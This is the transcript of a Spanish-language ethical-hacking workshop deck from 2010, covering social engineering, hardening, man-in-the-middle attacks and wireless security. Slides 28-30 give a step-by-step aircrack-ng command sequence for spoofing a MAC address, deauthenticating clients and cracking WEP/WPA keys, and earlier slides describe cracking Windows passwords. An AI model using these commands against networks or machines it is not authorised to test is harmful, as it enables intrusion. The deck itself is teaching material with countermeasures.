Your SlideShare is downloading. ×
Seguridad Informatica y Ethical Hacking
Upcoming SlideShare
Loading in...5
×

Thanks for flagging this SlideShare!

Oops! An error has occurred.

×

Saving this for later?

Get the SlideShare app to save on your phone or tablet. Read anywhere, anytime - even offline.

Text the download link to your phone

Standard text messaging rates apply

Seguridad Informatica y Ethical Hacking

8,538
views

Published on

Seguridad Informatica y Ethical Hacking

Seguridad Informatica y Ethical Hacking

Published in: Education

0 Comments
3 Likes
Statistics
Notes
  • Be the first to comment

No Downloads
Views
Total Views
8,538
On Slideshare
0
From Embeds
0
Number of Embeds
2
Actions
Shares
0
Downloads
475
Comments
0
Likes
3
Embeds 0
No embeds

Report content
Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

Cancel
No notes for slide

Transcript

  • 1. Universidad Tecnológica del Sur de Sonora eXpLoD Agosto 2010
  • 2. Agenda Presentación Disclaimer Arsenal Conceptos Básicos Seguridad Informática Ingeniería Social Seguridad dentro y fuera del equipo (Tipos de Seguridad) Software Reset Windows Password Tools (Hiren´s & UBCDW) Copy/Paste Hack Attack All Windows Versions (Ubuntu CD) OverView Crack Windows Passwords Tools (OphCrack) Contramedidas Endurecimiento de políticas de seguridad (Hardening) Herramientas de Intrusión: scanners, sniffers, IDS, etc.
  • 3. Agenda Ethical Hacking Ataque Man-in-the-middle (MitM), conceptos Remote Desktop Protocol (RDP), concepto y uso Cain MitM RDP Windows Sniffing Password Attack Contramedidas Network Wireless, conceptos, usos y características DEMO “Cracking Wireless Passwords“ con aircrack-ng OverView Contramedidas Recursos Preguntas y Respuestas Conclusiones Contacto
  • 4. Presentación ¿ Quién eres?, Quien Soy ? ¿ Qué sabes y que te gustaria aprender ? ¿ Por qué ?
  • 5. Disclaimer Todos los contenidos expuestos, actividades realizadas y demostraciones de esta conferencia- taller son con fines 100% educativos, por lo cual los expositores e institución educativa que los imparten se deslindan de cualquier responsabilidad que los participantes a dicho evento llegaran a adquirir por el mal uso o daño que pudieran causar con la información o herramientas aquí expuestas.
  • 6. Arsenal Para la realización de esta conferencia taller utilizaremos: - Desktop PC - VirtualBox - Tarjeta de red inalámbrica soportada por aircrack - Router inalámbrico - Computadora portátil - Maquinas virtuales de Windows XP, 2003, Vista y 7 - CDs de: Ubuntu 9.10, OphCrack, etc. - Software de propósito general
  • 7. Conceptos Básicos Hacker: Es una buena persona que hace cosas malas :P Red de computadoras: Montón de compus unidas por cable para pasarse virus, bajar música y chatear. Sistema Operativo: Programa que controla toda la compu (Windows, Linux, MacOS, Unix, etc.) Sniffer: Olfateador de red (sabueso) Virus: Invento del gobierno para distraer nuestra atención, H1N1
  • 8. Conceptos Básicos Firewall: Software o Hardware que protege los sistemas informáticos de intrusiones en la red Puerto: Número de conexión dentro de una computadora para transferir información en la red Cracker: “Criminal Hacker“ Escritorio Remoto: Aplicación para administrar a distancia una computadora (Ej. VNC y RDP) Windows: Muy CrackHackeable :P (Aquí lo demostraremos, jejejeje )
  • 9. Seguridad Informática ¿Que es? ¿Cómo nos afecta? • Es simplemente el conjunto • Estamos rodeados de elementos de métodos, formas y de seguridad informática: PIN de estándares que permiten tarjeta de débito y crédito, asegurar que las políticas de números de validación IMEI, una organización sean tokens bancarios, contraseñas utilizadas de la manera en de servicios en línea, validadores de sistemas (como Captcha) que fueron planeadas todos estos son parte de nuestra previniendo la alteración o vida diaria, sin una contraseña modificación o reemplazo de no podríamos accesar nuestra los datos o directivas cuenta de correo, o retirar dinero contenidas en nuestros de un cajero y si las perdemos o recursos de información por nos la roban suele ser laborioso (social y legal) el obtenerlos de personas o entidades no regreso. autorizadas. ¿Todo es basado en cómputo? ¿Cómo lo aseguramos? • No, en realidad un recurso • Dependiendo del tipo de informático es todo aquel recurso, si es electrónico que resguarda información, quizá sea necesario usar una ficha bibliográfica, una métodos de biométrica, si es muestra de ADN codificada, algo mecánico, es probable un pequeño papel con un que con un juego de llaves código de acceso para una de seguridad o de candados caja de seguridad mecánica, rotatorios logremos nuestro todo esto es información y objetivo, todo depende es tomado en cuenta al cuanto nos interesa momento de crear políticas, proteger la información. acuerdos y leyes sobre la informática.
  • 10. Ingeniería Social ¿Qué es? ¿Cómo me afecta? ¿Cómo puedo saber si estoy ¿Cómo puedo evitarlo? • Al no validar las referencias siendo victima de un •Sencillo, si no confiamos en la • En el campo de la informática se denomina o no seguir el protocolo de “ingeniero social”? persona que nos pide cierta “Ingeniería social” al seguridad adecuado para • Muy simple, cuando alguien información (supongamos un conjunto de métodos y divulgar contraseñas o nos pide algún tipo de técnico de soporte de nuestro prácticas usados para cualquier otra información información privilegiada y lugar de trabajo) podemos obtener información de sensible, podríamos ser esta persona es insistente pedirle que nos deje sus datos cómplices de un crimen, cuando le requerimos seguir y comunicarnos con el/ella 10 usuarios legítimos y con la México ha acordado con minutos después de validar si información obtenida lograr un protocolo para validar su la petición es legitima, es decir: acceso a sistemas organismos internacionales intención es altamente la homologación y/o solo sigamos los protocolos protegidos, siendo esta probable que estemos que existan para dar práctica de uso común entre adecuación de códigos siendo victimas de un información, podemos crear piratas informáticos y penales para que estos intento de robo de los propios en casa y seguir los delincuentes delitos sean perseguidos. información por un establecidos en la escuela u computacionales. ingeniero social/hacker. oficina.
  • 11. Seguridad Dentro y Fuera Debemos estar conscientes que ningún equipo o sistema es 100% seguro o fiable. Establecer (y seguir) protocolos y procedimientos de seguridad para contraseñas, códigos, PINs, que nos permitan asegurar que cuando nos sean requeridos, quien nos lo pida sea alguien autorizado y con un motivo válido. Adecuar estas políticas a nuestro propio equipo de cómputo y sistemas, portales y sitios que usamos con frecuencia (como longitud de contraseñas, uso de caracteres especiales y mayúsculas, etc.) y prevenir el uso de “cuentas compartidas” o “uso múltiple” pues eso eleva el riesgo de control y seguridad. Ser precavidos, si algo no parece estar correcto es muy probable que no lo este. Si estamos en la escuela u oficina y algo parece estar mal, reportarlo inmediatamente ya sea a nuestro jefe o profesor o al área encargada de sistemas. Seguir los reglamentos (si no nos esta permitido accesar ciertos sitios, no lo hagamos). Seguir nuestro instinto, muchas veces nosotros somos los mejores jueces para evaluar si algo esta bien o no.
  • 12. Tipos de Seguridad: Seguridad Física: Seguridad Física consiste en la "aplicación de barreras físicas y procedimientos de control, como medidas de prevención y contramedidas ante amenazas a los recursos e información confidencial"(1). Se refiere a los controles y mecanismos de seguridad dentro y alrededor del Centro de Cómputo así como los medios de acceso remoto al y desde el mismo; implementados para proteger el hardware y medios de almacenamiento de datos. Seguridad Lógica: La mayoría de los daños que puede sufrir un centro de cómputos no será sobre los medios físicos sino contra información por él almacenada y procesada. La Seguridad Física, sólo es una parte del amplio espectro que se debe cubrir para no vivir con una sensación ficticia de seguridad. Como ya se ha mencionado, el activo más importante que se posee es la información, y por lo tanto deben existir técnicas, más allá de la seguridad física, que la aseguren. Estas técnicas las brinda la Seguridad Lógica.
  • 13. Software Reset Windows Password Tools (Hiren´s & UBCDW) c:windowssystem32configsam
  • 14. Copy/Paste Hack Attack All Windows Versions (Ubuntu CD) Copy/Paste ??¡¡¡ OverView
  • 15. Crack Windows Passwords Tools (OphCrack) Woooow, is Cracking ¡¡¡¡ :x
  • 16. Contramedidas 1- Seguridad Física del equipo 2- Boot CD deshabilitado 3- Password supervisor habilitado 4- Contraseñas robustas contra el password cracking
  • 17. Hardening ¿Qué es? ¿Cómo se logra? • Un conjunto de métodos y directivas • Las técnicas son amplias y van desde que permiten elevar el nivel de la eliminación de cuentas de acceso seguridad de un servidor y validación mediante métodos computacional (principalmente) con alternativos (como LDAP) hasta la el fin de denegar accesos no desinstalación, revisión y adecuación autorizados y evitar intrusiones y/o de servicios, archivos de ataques computacionales, existen configuración e instalación de ciertos programas que nos ayudan a centinelas de cambios en las detectar fallos como “Bastille” de maquinas a “endurecer”, existen HP/Compaq que tuvo un éxito mas o incluso niveles que permiten menos amplio en sistemas con comunicación solo de 1:1 (es decir Solaris y posteriormente en sistemas una maquina solo va a “escuchar” a GNU/Linux. otra que fue validada y no más. ¿Quién lo hace? ¿Qué sistema es el más inseguro? • Principalmente, administradores de • En realidad, existe un mantra que sistemas o consultores de dice: “No hay sistema inseguro, seguridad computacional, la razón solo un mal administrador” es principal de esto es el decir, si adecuamos un equipo y conocimiento requerido en elevamos el nivel de seguridad a lo administración de sistemas e técnicamente posible, es muy infraestructura para poder llevar a probable que los demás errores cabo un buen endurecimiento (con sean bugs del software mismo. lo cual, una vez más, no podemos garantizar que sea 100% mas seguro, solo mas estable).
  • 18. Herramientas de Intrusión: scanners, sniffers, IDS, etc. • Denegación de servicio (PaP o distribuidas) • Exploración de servicios y vulnerabilidades Existen una gran (PenTesting y Exploitation) cantidad de • Rompimiento de claves de autenticación (Auth Cracking) herramientas de este • Capturadores de paquetes promiscuos (Sniffers, AirSniffers) tipo entre las mas • Enumeradores de puertos y adivinadores de comunes usadas en plataforma. • Enmascaradores o “phishing posers” (servicios que contra de servidores: parecen legítimos pero no lo son, enfocados al robo de información e identidad) • Troyanos Por el lado de los • Gusanos ataques a usuarios • Secuestradores y envenenadores de DNS existen las siguientes • Keyloggers herramientas: • Replicadores http://sectools.org/
  • 19. Ethical Hacking ¿Qué es? •La intrusión ética (o ethical hacking) es la aplicación de herramientas de intrusión, penetración, robo, ¿No es contraproducente? personificación y negación de servicio llevado a cabo por •No, al usar las armas que el “hackers éticos”, es decir, enemigo utiliza es mas factible personas con la experiencia y que podamos determinar el conocimiento suficiente para nivel de riesgo, y por tanto la llevar a cabo estas pruebas en respuesta que debemos dar ante nombre de la organización (es un ataque, es, viéndolo como decir de manera legal y prevista) analogía medica, como cuando para determinar el nivel de nos vacunan, pues nos inoculan seguridad de una red de equipos una “versión” del virus del cual o servicios (incluido el aspecto nos quieren hacer inmunes. de ingeniería social). ¿Por qué es importante? ¿Es fiable? •Al conocer el nivel de seguridad •Al contratar nosotros un servicio que se tiene en nuestra (o realizarlo de manera interna) organización es mucho mas estamos confiando en la ética sencillo, que no simple, el tomar profesional de quien evalúa por medidas que puedan subsanar lo que si, siempre llevamos un estas deficiencias. riesgo, pero se establece un contrato de buena fe haciéndolo “suficientemente fiable”.
  • 20. Ataque Man-in-the-middle (MitM), conceptos En criptografía, un ataque man-in-the-middle (MitM o intermediario, en castellano) es un ataque en el que el enemigo adquiere la capacidad de leer, insertar y modificar a voluntad, los mensajes entre dos partes sin que ninguna de ellas conozca que el enlace entre ellos ha sido violado. El atacante debe ser capaz de observar e interceptar mensajes entre las dos víctimas.
  • 21. Ataque Man-in-the-middle (MitM), conceptos El ataque MitM puede incluir algunos de los siguientes subataques: 1. Intercepción de la comunicación (eavesdropping), incluyendo análisis del tráfico y posiblemente un ataque a partir de textos planos (plaintext) conocidos. 2. Ataques a partir de textos cifrados escogidos, en función de lo que el receptor haga con el mensaje descifrado. 3. Ataques de sustitución. 4. Ataques de repetición. 5. Ataque por denegación de servicio (denial of service).
  • 22. Contramedidas Claves públicas Autenticación mutua fuerte Claves secretas (secretos con alta entropía) Passwords (secretos con baja entropía) Otros criterios, como el reconocimiento de voz u otras características biométricas
  • 23. Remote Desktop Protocol (RDP), concepto y uso Remote Desktop Protocol (RDP) es un protocolo propietario desarrollado por Microsoft que permite la comunicación en la ejecución de una aplicación entre un terminal (mostrando la información procesada que recibe del servidor) y un servidor Windows (recibiendo la información dada por el usuario en el terminal mediante el ratón ó el teclado).
  • 24. Cain MitM RDP Windows Sniffing Password Attack y Contramedidas RDP OverView
  • 25. Network Wireless, conceptos, usos y características El término red inalámbrica (Wireless network) en inglés es un término que se utiliza en informática para designar la conexión de nodos sin necesidad de una conexión física (cables), ésta se da por medio de ondas electromagnéticas. La transmisión y la recepción se realizan a través de puertos. Una de sus principales ventajas es notable en los costos, ya que se elimina todo el cable Ethernet y conexiones físicas entre nodos, pero también tiene una desventaja considerable ya que para este tipo de red se debe de tener una seguridad mucho mas exigente y robusta para evitar a los intrusos.
  • 26. DEMO “Cracking Wireless Passwords“ con aircrack-ng OverView y Contramedidas Free Ilegal INternet
  • 27. DEMO “Cracking Wireless Passwords“ Aircrack: http://www.aircrack-ng.org/ Aircrack Spanish: http://www.aircrack.es/ Compatibilidad de tarjetas inalámbricas con Linux: http://linux-wless.passys.nl/query_alles.php
  • 28. DEMO “Cracking Wireless Passwords“ sudo apt-get install aircrack-ng sudo apt-get install macchanger sudo airmon-ng start wlan0 sudo ifconfig mon0 down sudo macchanger -m 00:11:22:33:44:55 mon0 sudo ifconfig mon0 up sudo airodump-ng mon0
  • 29. DEMO “Cracking Wireless Passwords“ control + c sudo airodump-ng -c [# canal] -w [nombre red] --bssid [direccion MAC] mon0 PARA WEP sudo aireplay-ng -1 6000 -a [direccion MAC] -h 00:11:22:33:44:55 mon0 PARA WPA sudo aireplay-ng -0 1 -a [direccion MAC] -c [STATION] mon0 PARA WEP sudo aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b [direccion MAC] -h 00:11:22:33:44:55 mon0 PARA WPA sudo aircrack-ng -w [/directorio/del/diccionario.lst] [NOMBRE]*.cap
  • 30. DEMO “Cracking Wireless Passwords“ PARA WEP sudo aircrack-ng -z [nombre red]*.cap Esperaremos a que finalice la captura de los paquetes y a su vez el crackeo de los mismos, hasta que se nos muestre la clave de la red.
  • 31. Contramedidas Mac Address Filtering Hide Wireless SSID WPAAuthentication System
  • 32. Recursos Aprende Viendo: http://aprendeviendo.org.mx OphCrack: http://ophcrack.sourceforge.net/ UBCD for Windows: http://www.ubcd4win.com/ Top 100 Network Security Tools: http://sectools.org/ Cain & Abel: http://www.oxid.it/cain.html Aircrack-ng: http://www.aircrack-ng.org/ Ubuntu: http://www.ubuntu.com/ Hiren´s Boot CD: http://www.hirensbootcd.net/ Process Monitor: http://technet.microsoft.com/en-us/sysinternals/bb896645.aspx Backtrak: http://www.backtrack-linux.org/
  • 33. Preguntas y Respuestas
  • 34. Conclusiones La seguridad computacional como un todo. El elemento humano dentro de la seguridad computacional. El establecimiento de reglas para un mejor nivel de seguridad. Necesidad de profesionistas calificados para estos trabajos. Gran amplitud de herramientas OpenSource. Compromiso social y ético para sistemas. Innovación diaria.
  • 35. Contacto
  • 36. Gracias ¡¡